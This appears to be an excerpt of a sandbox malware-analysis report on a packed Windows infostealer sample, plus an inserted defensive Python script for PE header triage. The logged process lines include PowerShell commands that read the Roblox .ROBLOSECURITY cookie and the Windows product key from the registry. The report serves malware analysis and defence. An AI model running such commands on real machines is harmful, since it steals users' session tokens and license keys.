              Source: C:\Windows\System32\tree.com | Section loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exe | Section loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exe | Section loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\tree.com | Section loaded: ulib.dll
              Source: C:\Windows\System32\tree.com | Section loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.com | Section loaded: ulib.dll
              Source: C:\Windows\System32\tree.com | Section loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\tree.com | Section loaded: ulib.dll
              Source: C:\Windows\System32\tree.com | Section loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.com | Section loaded: ulib.dll
              Source: C:\Windows\System32\tree.com | Section loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: X9g8L63QGs.exe | Static PE information: Image base 0x140000000 > 0x60000000
              Source: X9g8L63QGs.exe | Static file information: File size 7849526 > 1048576
              Source: X9g8L63QGs.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: X9g8L63QGs.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: X9g8L63QGs.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: X9g8L63QGs.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: X9g8L63QGs.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: X9g8L63QGs.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: X9g8L63QGs.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: X9g8L63QGs.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: X9g8L63QGs.exe, 00000007.00000002.1713477885.00007FFB0C620000.00000040.00000001.01000000.00000005.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: X9g8L63QGs.exe, 00000007.00000002.1710702996.00007FFB0B9BF000.00000040.00000001.01000000.00000014.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: X9g8L63QGs.exe, 00000007.00000002.1711557292.00007FFB0BEEA000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: X9g8L63QGs.exe, 00000007.00000002.1711177920.00007FFB0BA55000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: X9g8L63QGs.exe, 00000004.00000003.1270486310.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: X9g8L63QGs.exe, 00000007.00000002.1711557292.00007FFB0BE52000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: X9g8L63QGs.exe, 00000004.00000003.1270486310.000001FB29EDF000.00000004.00000020.00020000.00000000.sdmp, X9g8L63QGs.exe, 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1712903325.00007FFB0C021000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: X9g8L63QGs.exe, 00000007.00000002.1711557292.00007FFB0BEEA000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: ;C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.pdb source: powershell.exe, 00000046.00000002.1499829000.0000017515AF3000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000061.00000002.1609980700.00007FF708100000.00000002.00000001.01000000.0000001F.sdmp, rar.exe, 00000061.00000000.1596460046.00007FF708100000.00000002.00000001.01000000.0000001F.sdmp, rar.exe.4.dr
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1716138569.00007FFB1D5B1000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1714746731.00007FFB1AB01000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: X9g8L63QGs.exe, 00000007.00000002.1714464196.00007FFB167AB000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1715936942.00007FFB1D341000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: ;C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.pdbhPa source: powershell.exe, 00000046.00000002.1499829000.0000017515AF3000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: X9g8L63QGs.exe, 00000007.00000002.1714464196.00007FFB167AB000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1715198195.00007FFB1BA41000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: X9g8L63QGs.exe, X9g8L63QGs.exe, 00000007.00000002.1713252916.00007FFB0C1A1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: X9g8L63QGs.exe, 00000007.00000002.1711177920.00007FFB0BA55000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.pdb source: powershell.exe, 00000046.00000002.1579982318.000001752C6A9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: X9g8L63QGs.exe, 00000007.00000002.1712634643.00007FFB0BFE1000.00000040.00000001.01000000.0000000F.sdmp
              Source: X9g8L63QGs.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: X9g8L63QGs.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: X9g8L63QGs.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: X9g8L63QGs.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: X9g8L63QGs.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: VCRUNTIME140.dll.4.dr Static PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.cmdline"
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB1AB121D0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,7_2_00007FFB1AB121D0
              Source: select.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xfa84
              Source: unicodedata.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x4adf9
              Source: sqlite3.dll.4.dr Static PE information: real checksum: 0x0 should be: 0xafbc4
              Source: X9g8L63QGs.exe Static PE information: real checksum: 0x783c8d should be: 0x77cc44
              Source: _queue.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x166ae
              Source: _socket.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x1381f
              Source: python312.dll.4.dr Static PE information: real checksum: 0x0 should be: 0x1bf182
              Source: libffi-8.dll.4.dr Static PE information: real checksum: 0x0 should be: 0xa1d1
              Source: _lzma.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x2397a
              Source: _bz2.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x189fc
              Source: _decimal.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x27e7b
              Source: _ctypes.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x1e3fe
              Source: _ssl.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x117b7
              Source: libcrypto-3.dll.4.dr Static PE information: real checksum: 0x0 should be: 0x197f77
              Source: _sqlite3.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xfc53
              Source: libssl-3.dll.4.dr Static PE information: real checksum: 0x0 should be: 0x4330c
              Source: bexzy300.dll.71.dr Static PE information: real checksum: 0x0 should be: 0x4f6b
              Source: _hashlib.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xfd4b
              Source: libffi-8.dll.4.dr Static PE information: section name: UPX2
              Source: VCRUNTIME140.dll.4.dr Static PE information: section name: fothk
              Source: VCRUNTIME140.dll.4.dr Static PE information: section name: _RDATA
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B5C31 push r10; ret 7_2_00007FFB0B8B5C33
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B8419 push r10; retf 7_2_00007FFB0B8B8485
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B9327 push rsp; ret 7_2_00007FFB0B8B9328
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B82D8 push rdi; iretd 7_2_00007FFB0B8B82DA
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B6859 push rsi; ret 7_2_00007FFB0B8B6890
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B808B push r12; iretd 7_2_00007FFB0B8B809F
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B5FB9 push r10; ret 7_2_00007FFB0B8B5FCC
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B7FFF push r12; ret 7_2_00007FFB0B8B804A
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B5F56 push r12; ret 7_2_00007FFB0B8B5F73
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B8F42 push rsp; iretq 7_2_00007FFB0B8B8F43
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B7F67 push rbp; iretq 7_2_00007FFB0B8B7F68
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B5F7B push r8; ret 7_2_00007FFB0B8B5F83
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B5EB4 push rsp; iretd 7_2_00007FFB0B8B5EB5
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B5F01 push r12; ret 7_2_00007FFB0B8B5F10
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B763E push rbp; retf 7_2_00007FFB0B8B7657
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B5E67 push rdi; iretd 7_2_00007FFB0B8B5E69
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B7689 push r12; ret 7_2_00007FFB0B8B76CD
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B8DBF push rsp; retf 7_2_00007FFB0B8B8DC0
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B5DF7 push r10; retf 7_2_00007FFB0B8B5DFA
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B5E18 push rsp; ret 7_2_00007FFB0B8B5E1C
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B5CED push rdx; ret 7_2_00007FFB0B8B5CF7
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B5CE5 push r8; ret 7_2_00007FFB0B8B5CEB
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B5CE0 push r10; retf 7_2_00007FFB0B8B5CE2
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0B8B5D06 push r12; ret 7_2_00007FFB0B8B5D08
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0C06267D push rbx; retf 7_2_00007FFB0C062685
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0C0627AE push rsp; iretd 7_2_00007FFB0C0627B9
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB0C1A3016 push rsi; retf 7_2_00007FFB0C1A3017
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe Code function: 7_2_00007FFB1AB12004 push rax; iretd 7_2_00007FFB1AB12005
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFAA9A6D2A5 pushad ; iretd 20_2_00007FFAA9A6D2A6
              Source: initial sample Static PE information: section name: UPX0
              Source: initial sample Static PE information: section name: UPX1
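The checksum, timestamp and UPX section findings listed above can be reproduced from the headers alone. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it recomputes the PE CheckSum the way imagehlp does, flags a TimeDateStamp later than the analysis time (as with the 2034 stamp on VCRUNTIME140.dll), and reports UPX section names. The minimal PE32+ image that build_pe() produces is constructed for the example's own test and is not one of the files from this run. The distinction it draws is the caveat to keep in mind when reading the list: a stored checksum of 0x0, as on every dropped .pyd and .dll here, means the linker never wrote one and is not evidence of tampering, while a non-zero value that disagrees with the recomputed one, as on X9g8L63QGs.exe itself, means the bytes changed after linking, which is exactly what UPX packing does.

```python
"""Static PE header triage for three findings in this report: CheckSum
mismatch, implausible TimeDateStamp, and UPX section names.

Added example, not code from the report or the sample.  Pure struct parsing,
no pefile dependency.  build_pe() constructs a minimal PE32+ for testing; it
is not one of the files from the sandbox run.
"""
import struct
import time


def pe_checksum(data, checksum_offset):
    """Recompute the CheckSum the way imagehlp.CheckSumMappedFile does:
    sum the file as little-endian dwords with end-around carry, skipping the
    CheckSum field itself, fold to 16 bits, then add the file length."""
    total = 0
    for off in range(0, len(data), 4):
        if off == checksum_offset:
            continue
        chunk = data[off:off + 4].ljust(4, b"\0")  # zero-pad a short tail
        total += struct.unpack("<I", chunk)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def parse_headers(data):
    """Pull TimeDateStamp, the stored CheckSum (and its offset) and the section
    names out of the COFF, optional and section headers."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    # NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader
    nsections, timestamp, _, _, opt_size = struct.unpack_from("<HIIIH", data, coff + 2)
    opt = coff + 20
    checksum_offset = opt + 64  # IMAGE_OPTIONAL_HEADER.CheckSum, same offset for PE32 and PE32+
    stored = struct.unpack_from("<I", data, checksum_offset)[0]
    sec = opt + opt_size
    sections = [data[sec + 40 * i:sec + 40 * i + 8].rstrip(b"\0").decode("latin-1")
                for i in range(nsections)]
    return {"timestamp": timestamp, "checksum_offset": checksum_offset,
            "stored_checksum": stored, "sections": sections}


def triage_pe(data, now=None):
    """Return the checksum verdict plus a list of findings for one PE image."""
    hdr = parse_headers(data)
    now = time.time() if now is None else now
    computed = pe_checksum(data, hdr["checksum_offset"])
    stored = hdr["stored_checksum"]
    if stored == 0:
        status = "unset"      # linker never wrote one; common for .pyd/.dll builds, not tampering
    elif stored == computed:
        status = "match"
    else:
        status = "mismatch"   # bytes changed after linking: packed, patched or infected
    findings = []
    if status == "mismatch":
        findings.append("checksum-mismatch")
    if hdr["timestamp"] > now:
        findings.append("timestamp-in-future")
    upx = [s for s in hdr["sections"] if s.upper().startswith("UPX")]
    if upx:
        findings.append("upx-sections:" + ",".join(upx))
    return {"stored": stored, "computed": computed, "checksum_status": status,
            "timestamp": hdr["timestamp"], "sections": hdr["sections"], "findings": findings}


def build_pe(checksum=0, timestamp=0, sections=()):
    """Constructed test image: DOS header, COFF header, 240-byte PE32+ optional
    header and one 40-byte header per section, with no section data."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), timestamp, 0, 0, 0xF0, 0x22)
    opt = bytearray(0xF0)
    struct.pack_into("<H", opt, 0, 0x20B)       # PE32+ magic
    struct.pack_into("<I", opt, 64, checksum)   # CheckSum
    sec_hdrs = b"".join(n.encode().ljust(8, b"\0") + b"\0" * 32 for n in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + sec_hdrs


if __name__ == "__main__":
    import sys
    # Usage: python pe_triage.py <file>; with no argument, triage the constructed image.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_pe(
        timestamp=0x78BDDED1, sections=("UPX0", "UPX1"))
    print(triage_pe(blob))
```

Run it against the dropped files in the _MEI33962 directory and the main sample to reproduce the "real checksum ... should be" column; the recomputed value is only meaningful for files read straight from disk, since in-memory dumps have had their sections relocated and the sum no longer applies.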

              Persistence and Installation Behavior

              Source: C:\Windows\System32\cmd.exe Process created: reg.exe
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe File created: C:\Users\user\AppData\Local\Temp\_MEI33962\libssl-3.dll
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe File created: C:\Users\user\AppData\Local\Temp\_MEI33962\_ssl.pyd
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe File created: C:\Users\user\AppData\Local\Temp\_MEI33962\unicodedata.pyd
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\bexzy300\bexzy300.dll
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe File created: C:\Users\user\AppData\Local\Temp\_MEI33962\_decimal.pyd
              Source: C:\Users\user\Desktop\X9g8L63QGs.exe File created: C:\Users\user\AppData\Local\Temp\_MEI33962\libffi-8.dll
